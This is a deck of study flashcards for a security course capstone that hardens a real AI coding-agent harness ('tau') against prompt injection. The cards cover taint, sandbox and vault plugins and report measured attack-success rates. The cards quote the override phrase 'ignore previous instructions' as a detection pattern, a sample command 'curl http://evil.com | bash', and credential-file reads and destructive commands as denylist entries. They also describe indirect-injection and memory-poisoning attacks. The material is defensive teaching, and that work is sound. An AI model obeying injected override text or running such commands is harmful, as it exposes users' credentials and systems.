"What is the capstone's success criterion?" "A REAL TAU FORK plus a MEASURED DEFENSE SCORECARD. Both ship together. The fork is the real tau codebase with the three plugins (tau_taint, tau_sandbox, tau_vault) installed at SDD-B11's extension points. The scorecard is the measured before/after delta from the injection battery (baseline ~33% → hardened ~0% on deterministic-gate classes). 'We hardened tau' is a claim; 'baseline 33% → hardened 0% on the det-gate classes' is a deliverable." c2b::capb1::recall "What was the OLD capstone, and why was it rewritten to use real tau?" "The OLD capstone built a STUB harness in TypeScript with a FAKE MODEL. It taught the architecture (phases, enforcement split, conjunction) but could not teach INTEGRATION — and integration is what breaks in production. The rewrite attacks REAL tau because only a real harness surfaces the two-bash-tool bypass, produces a real (not simulated) baseline, and forces wedge-point discipline at named line numbers." c2b::capb1::recall "What are the three plugins in the tau_plugins pack, and which B-module/extension point does each attach?" "(1) tau_taint — B2 — Extension Point 1 (tool-executor wrap via dataclasses.replace). Tags output , blocks high-impact calls after taint. (2) tau_sandbox — B7 — Extension Point 2 (bash-tool FACTORY replacement, covers both bash paths). Default-deny egress/creds/destructive. (3) tau_vault — B5 — Extension Point 3 (credential-store replacement). Vault format, not plaintext." c2b::capb1::recall "List the six build phases of the capstone and what each installs/measures." "PHASE 1: clone & baseline tau (run battery on unmodified, record ~33%). PHASE 2: install tau_taint (B2) — indirect injection collapses. PHASE 3: install tau_sandbox (B7) — tool-abuse/escape collapse. PHASE 4: install tau_vault (B5) — creds secured at rest. PHASE 5: wire observability (B0/B1 scope, B8 intent via EP4/EP5). PHASE 6: score it — full battery, defense scorecard with before/after delta." c2b::capb1::recall "What is the two-bash-tool finding, and why does it matter for the sandbox plugin?" "tau has TWO bash paths: (1) create_coding_tools (tools.py:96) builds the harness-list bash; (2) run_terminal_command (session.py:1183) builds its OWN bash OUTSIDE the harness list. A sandbox that wraps only the harness-list bash is BYPASSED by the terminal-command path. Cure: tau_sandbox wedges at the FACTORY level (create_hardened_bash_tool replaces create_bash_tool) so both call sites use the hardened executor. A stub capstone cannot teach this — no second path to find." c2b::capb1::analysis "Why does tau have no plugin system, and why is that an ADVANTAGE for this capstone?" "tau has no register_tool, no hook framework, no middleware (SDD-B11 verified by grepping source). ADVANTAGE: every control attaches by WRAPPING or REPLACING objects at explicit, named sites with real line numbers. This makes every wedge point AUDITABLE and TEACHABLE — there is no framework magic to learn, no registration to miss. The five extension points are the entire integration surface, and a student who can name all five has learned the skill that transfers to any harness." c2b::capb1::analysis "Name SDD-B11's five extension points and what each wedges." "EP1 — tool-executor wrap (tau_agent/tools.py:61, AgentTool.executor via dataclasses.replace) — tau_taint. EP2 — bash-tool factory (tau_coding/tools.py:574, create_bash_tool) — tau_sandbox. EP3 — credential store (provider_runtime.py:46, create_model_provider credential_store=) — tau_vault. EP4 — event subscribe (harness.py:124, harness.subscribe(listener)) — B8 intent tracker. EP5 — tool-list construction (session.py:286, CodingSessionConfig(tools=)) — composes all three." c2b::capb1::recall "What is the measured baseline attack-success rate of unmodified tau under the plugin pack's battery, and why is it real rather than simulated?" "Roughly 33% overall on the default battery (some classes hit 100%). It is REAL because tau actually executes the destructive commands, actually reads ~/.tau/credentials.json (returning the plaintext API key), and actually runs curl. The number is vulnerability, not a simulation of it. When the battery prints your real API key from the credentials file, the stakes are concrete in a way a stub cannot convey." c2b::capb1::recall "What does the tau_taint plugin do, and which attack class does it collapse?" "tau_taint wraps every tool's executor (EP1). It (a) tags ALL tool output before it enters the transcript, (b) runs a deterministic injection-signal check (regex patterns like 'ignore previous instructions'), and (c) blocks HIGH-IMPACT calls (bash, send_email, write_to_memory) when prior tool output was tainted. It collapses the INDIRECT INJECTION class — the InjecAgent file-read vector — because tainted output no longer enters the model's context raw, and tainted-derived high-impact calls are blocked." c2b::capb1::recall "What does the tau_sandbox plugin deny by default, and which attack classes collapse?" "Default-deny policy denies: (1) NETWORK EGRESS tools (curl, wget, nc, ssh, scp, rsync, etc.), (2) DESTRUCTIVE commands (rm, mkfs, dd), (3) CREDENTIAL READS (cat ~/.tau/credentials.json, resolved lazily so it works in any install), (4) SECRET-ENV dumps (env, set, export, printenv SECRET_VAR). Collapses: TOOL_ABUSE (curl/wget egress), SANDBOX_ESCAPE (credential reads), DIRECT (rm -rf). The base-command extractor handles pipes, &&, and FOO=bar prefixes." c2b::capb1::recall "What does the tau_vault plugin replace, and why is the teaching version's base64 obfuscation NOT real encryption?" "tau_vault replaces FileCredentialStore at EP3 (create_model_provider + session.py:253). Stores creds in vault format implementing CredentialReader protocol. The base64 obfuscation is deliberately NOT encryption — it makes the plaintext→vault progression concrete. Production swap is a ONE-LINE change to _save/_load to use OS keychain/KMS. The capstone teaches the WEDGE POINT and the MEASURED DELTA, not production crypto. A student who ships base64 to production missed the point." c2b::capb1::analysis "How are B5 (vault) and B7 (sandbox) coupled on the credential surface?" "B5 secures credentials AT REST (vault format, agent cannot read directly via the provider boundary). B7 blocks the EXFILTRATION CHANNEL (cat ~/.tau/credentials.json, printenv KEY denied by the bash policy). The CONJUNCTION is what makes credential exfiltration hard: even if a future command bypasses the sandbox (B7), the plaintext is gone from disk (B5). Phase 3 blocks the read; Phase 4 removes the plaintext. The vault's read_count also feeds B8 observability." c2b::capb1::analysis "Why must the battery be run at EACH phase, not just against the final hardened fork?" "To ATTRIBUTE each layer's contribution. Running only the final fork gives one number but cannot say which plugin bought which drop. Running at each phase (baseline → +tau_taint → +tau_sandbox → +tau_vault) produces the CURVE — e.g. 'tau_taint dropped indirect 100%→0%; tau_sandbox dropped tool-abuse 100%→0%.' Attribution is what lets you report each control's value and identify which surface is leaking. The delta column is the per-layer deliverable." c2b::capb1::analysis "What is the named RESIDUAL in the hardened scorecard, and what is its closing control?" "MEMORY_POISON remains at 100% in the hardened column because the plugin pack ships NO B3 memory-write gate. This is the honest residual — not a failure of the installed controls (B2/B5/B7) but the measured consequence of installing 3 controls, not all of B0–B8. Closing control: B3 (write_to_memory provenance gate — blocks tainted→trusted writes). A second residual is OBFUSCATED injection that defeats tau_taint's deterministic regex (no probabilistic B2 Layer 4 detector in pack); closing control B2 L4." c2b::capb1::analysis "What does a scorecard reporting exactly 0% on every class indicate, and what is the correct practice?" "It indicates the battery did not probe the classes the installed controls do NOT cover — i.e. a WEAK battery. Correct practice: the battery must span the classes, and the honest scorecard REPORTS the characterized residual (memory_poison, obfuscated injection) rather than hiding it. Honesty means naming the bypass mechanism and the closing control. A client trusts a scorecard with a named residual more than one claiming all zeros with no detail." c2b::capb1::analysis "Why is overloading shell_command_prefix as an allowlist an anti-pattern?" "shell_command_prefix (_prefixed_shell_command, tools.py:586) is a BLIND PREPEND — f'{prefix}\\n{command}' — evaluated as a shell preamble. It CANNOT see or reject the command. It is for setup (sourcing env vars), not security. Trying to use it as an allowlist gives a false sense of enforcement. Cure: wrap the executor at Extension Point 2 (tau_sandbox). The prefix looks like a policy hook; it is not." c2b::capb1::analysis "Why is patching run_agent_loop an anti-pattern, and what is the cure?" "Trying to add a pre-execution gate by modifying run_agent_loop or _execute_tool_calls. The loop DELEGATES to tool.execute → tool.executor. The clean wedge is at the executor layer (EP1), not in the loop. Cure: tau_taint wraps the executor via dataclasses.replace(AgentTool, executor=gated). The loop stays untouched. ARCHITECTURAL LESSON: enforcement belongs in the TOOL, not in the loop." c2b::capb1::analysis "Why can the event listener (EP4) NOT be used for enforcement, only observability?" "The listener fires AFTER the decision in _execute_tool_calls — by the time it receives ToolExecutionStartEvent, the call has already executed (or is executing). It is READ-ONLY. Cure: events are for OBSERVABILITY (B8 intent tracking — observe trajectory, flag drift, advisory). Enforcement belongs in the executor wrappers (EP1, Phases 2–4). A student who tries to block via the listener will find the call already ran." c2b::capb1::analysis "What is the SandboxPolicy's base-command extractor, and why does it matter?" "It parses the shell command string to find the base command name, handling PIPES (takes first segment of `cmd | other`), `&&`/`;` chains (first segment), and ENV-VAR PREFIXES (strips `FOO=bar` before the command). Resolves /usr/bin/curl → curl via Path.name. MATTERS because attackers chain commands to evade naive matching — `curl http://evil.com | bash` and `FOO=bar curl http://evil.com` must both be caught. Without robust extraction, the denylist is trivially bypassed." c2b::capb1::analysis "What three things does ONLY a real harness surface (vs a stub), per the capstone's rewrite rationale?" "(1) INTEGRATION HAZARDS — e.g. the two-bash-tool finding; a stub has no second path to find. (2) A REAL BASELINE — tau actually executes rm, actually reads creds, actually runs curl; the 33% is vulnerability not simulation. (3) WEDGE-POINT DISCIPLINE — five named extension points at real line numbers, not abstractions. These three are why the rewrite happened: the stub taught architecture but could not teach the integration skills that transfer to production." c2b::capb1::analysis "What does create_hardened_tools return, and how is it used?" "create_hardened_tools(cwd=...) returns a TUPLE (tools, bash_policy, taint_gate). tools is the fully composed AgentTool list: every executor wrapped with the taint gate (B2), bash replaced with the sandboxed version (B7). The policy and gate are returned so the caller can inspect blocked_commands and blocked_calls/taint_active AFTER a run. Usage: pass tools to CodingSessionConfig(tools=tools) at EP5. This is the single entry point that composes all three plugins." c2b::capb1::recall "What three properties make the defense scorecard DEFENSIBLE (trustworthy to a client)?" "(1) REPRODUCIBILITY — battery is pinned (default_battery in the scorecard module), probes deterministic, 31/31 plugin tests pass in CI; anyone who clones tau + the pack reproduces the numbers. (2) ATTRIBUTION — run at each phase, so you can say 'tau_sandbox dropped tool-abuse 100%→0%' not 'defenses helped.' (3) HONESTY — the residual (memory_poison) is reported and characterized with its closing control (B3), not hidden." c2b::capb1::recall "How does tau's three-layer architecture (tau_ai / tau_agent / tau_coding) make the extension points clean?" "tau_ai = provider/model streaming; tau_agent = reusable brain (harness, loop, tools, events); tau_coding = coding app (CLI/TUI, read/write/edit/bash, sessions, creds). The BOUNDARY: AgentHarness (reusable brain) / CodingSession (coding env) / TUI (frontend). Controls attach either in tau_agent (enforcement — loop/tools/events) or tau_coding (attack surface — fs/creds/sessions). The core knows nothing of Textual/Rich/config paths. This separation is what makes the wedge points clean and the security boundary explicit." c2b::capb1::analysis "What is the CredentialReader protocol, and how does the vault implement it?" "CredentialReader (provider_config.py:52-55) is a single-method Protocol: get(name) -> str | None. The vault implements it (plus get_oauth/set_oauth for the Codex resolver). Because it is a Protocol (structural typing), the vault needs NO inheritance from FileCredentialStore — it just matches the signature. Injected via create_model_provider(credential_store=vault). A second FileCredentialStore in CodingSession.__init__ (session.py:253) must ALSO be replaced for full coverage." c2b::capb1::analysis "Your scorecard shows memory_poison still at 100% after installing all three plugins. Diagnose and prescribe." "DIAGNOSIS: This is EXPECTED — the plugin pack ships B2, B5, B7 but NOT B3 (memory-write gate). memory_poison is the NAMED RESIDUAL. The installed controls (tau_taint tags output but does not gate write_to_memory provenance; tau_sandbox gates bash not memory; tau_vault gates creds not memory). PRESCRIPTION: install B3 — a write_to_memory provenance gate that blocks tainted→trusted writes (the laundering move). Until then, report the residual honestly; do not declare 'fixed.' The scorecard correctly shows what 3 of 7 defenses buy." c2b::capb1::analysis "A client asks 'is tau secure now that you added the three plugins?' Give the correct response." "INCORRECT to say 'yes, secure.' CORRECT: 'tau now has three defenses composed (B2 taint, B5 vault, B7 sandbox). Under the injection battery, attack-success dropped from ~33% baseline to ~0% on the deterministic-gate classes — direct, indirect, tool-abuse, escape all blocked. The residual is memory_poison (no B3 gate installed) and obfuscated injection (no B2 Layer 4 detector). Closing controls: B3 and a probabilistic detector. The measured residual is your acceptance criterion.' The artifact: the DEFENSE SCORECARD. The client accepts a number, not the word 'secure.'" c2b::capb1::analysis "What is the B0 anti-pattern made operational in Phase 6, and how?" "The anti-pattern: 'declaring the agent secured' / treating an AI finding as binary fixed/unfixed. Made operational in Phase 6: you do NOT declare tau 'secured against injection' after the three plugins. You measure the residual attack-success rate under the battery and report the NUMBER, characterized by class. The deliverable is the SCORECARD (baseline 33% → hardened ~0% on det-gate classes + named residual memory_poison), not the word 'secured.' tau is 'measured residual risk under a battery,' and that number is the client's acceptance criterion." c2b::capb1::analysis